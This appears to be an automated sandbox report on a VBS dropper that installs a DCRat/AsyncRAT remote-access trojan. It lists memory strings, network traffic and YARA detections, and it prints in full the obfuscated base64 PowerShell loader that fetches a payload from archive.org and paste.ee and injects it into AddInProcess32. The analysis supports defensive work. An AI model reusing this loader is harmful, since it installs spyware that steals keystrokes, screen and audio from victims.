Source: powershell.exe, 00000004.00000002.2257689988.000002199091E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000004.00000002.2257689988.00000219907A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2309802414.000002015109D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198EEC1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2257689988.00000219905C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2257689988.00000219907A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2309802414.000002015101B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2309802414.000002015106E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198EEC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000004.00000002.2257689988.00000219907A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2257689988.000002199009B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2257689988.0000021990282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia600100.us.arX
Source: powershell.exe, 00000004.00000002.2257689988.000002198F0E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.0000021990282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia600100.us.archive.org
Source: powershell.exe, 00000004.00000002.2257689988.000002198F0E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.0000021990282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Source: powershell.exe, 00000004.00000002.2257689988.000002198F0E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content
Source: powershell.exe, 00000004.00000002.2257689988.000002199091E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2274321947.000002199EF3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2257689988.00000219905C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2257689988.00000219905C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000004.00000002.2257689988.000002198F307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000004.00000002.2257689988.000002198F307000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/AaTNM/0
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000004.00000002.2257689988.000002198F4BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2257689988.000002198F29C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000005.00000002.3466547195.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000005.00000002.3466547195.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: powershell.exe PID: 4000, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD347A25FA	2_2_00007FFD347A25FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD347A29FA	2_2_00007FFD347A29FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A6060	4_2_00007FFD347A6060
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A25FA	4_2_00007FFD347A25FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A95F2	4_2_00007FFD347A95F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A4A1D	4_2_00007FFD347A4A1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A29C3	4_2_00007FFD347A29C3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A36FA	4_2_00007FFD347A36FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347AFF4D	4_2_00007FFD347AFF4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347A2EB5	4_2_00007FFD347A2EB5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD34870002	4_2_00007FFD34870002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD347B0A71	4_2_00007FFD347B0A71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_00D665D0	5_2_00D665D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_00D66EA0	5_2_00D66EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_00D66288	5_2_00D66288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_00D6B590	5_2_00D6B590

Source: 1iH5ABLKIA.vbs

Initial sample: Strings found which are bigger than 50

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 4.2.powershell.exe.2198f4fa460.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000005.00000002.3466547195.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000005.00000002.3466547195.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: powershell.exe PID: 4000, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: AddInProcess32.exe PID: 5792, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12

Source: 4.2.powershell.exe.2198f4fa460.0.raw.unpack, Settings.cs	Base64 encoded string: 'umHrStN1RxgB07nHQrpsMUIWDmSi9QV4SuvD/LLNFAWOLAVbkVmBeVE0CVy1nzUhKwmyP2ckYiyArewUgrmawA==', 'g0OeKS3kucr0CuiXVMR5bvzBnu+mj5daLdHMOyafbwg8EhqdiDLbxaVmLkFPb9KIf6nMXqeFo9F0n4pz17bFkA==', 'UViCp1Rgr3pl1eweamMomnvNT9Nj5I9I4M/DHnojF58BGj5sa9Q9ztr/NscZF5SiZWAO33SoTtt676mUWLeAlg==', 'oB217ACHhWEcdsOasnvNMaFUBKPxmiGZFAggIqX+SHM73bXt+E61bv/KRjHcFhf7USTnKjcsLFOKcC7dQpXw+moQ4bZ/AD5UAx7Z2dsx39rYyp+RUfTa6XH8CCyXmy4NA3d3oqZBiGYPnaRxqO09kA8K1eIplPDDpCFMWr2gyRxA0DDhpgugAL9RZdHF7f14geTRg3SvLBQxnLpAgszj9uQQ4jgNI09FIvtX7gCMUEnhxnfTgWbvpEya7HNPHIzUtgbMGZVrv4tubLLV5biqCWJeno1+QVrQgCDxeWKMKR9ugMQZFpubuqFXU9UkN0X7/OyAsDYpsBHdIj8IpE54Qv1Ew/WzojE0exDu/rDXeb6hasAuWxfgl3NDiW2TFG7GLdI9kj0/9eZTqFlNbL+qICrU1euazXoU0gxTNj9zVAmBe4IMmK54UlYTRIltn1i1w3Ua7e+J3hQswYi8KA11IVssTGKamFqTaNxU5vX7o8OGYGfBHbYhx6x6HID1zyYGdshW5bGnojS/dnSGYOcPHRI457DgyXeV/vS8Ky0+oke9bkWLU/pIgQYD8w+RudXhGQL9Ks/BmjelLqXIXdEA+Qr9JrBunG67KztyEmDOo6oRSN7W44FUCaAaOAKQ7h10Vvg4CBCNHYOO1ZLqnW074W0IKJVGLYO78DETExueI1p5F7CRNLQa+/Pw6tQ9s+oRZ8hfCogRnLh0wDpVsAZoQ9f+PdJnNNgLs8c6L3NcgX35aAbiBEVoWlBgc31TgLvMxRuVmfcc5BxJtuTZJHDawiREHgUDSbDYqftzVJZXYA1kxS41TXvuViQm7Zmv/tcgFrFt99rbQ3GrqjRkbkJXt4eTIjCFIIQOFYX5+rU8+ksGJtIhB0/HlRN0oZV5JJZ1ciHDcsg2PL0wDrnIEJ3KSC2f43H3N2tqQXLCJjPjm0GQBr0aI0MgVzIn52kZJvWMN9vhE/QFaSQiYN/FwKAcGB4tRUPiHZjO5OgQZx79LT3qC5Wik0sAJ3y+2wWUOM3TZc19DzdYD0YlcZrp2xO+tBNTY1TMrUM9DCdAK4rsdLk=', 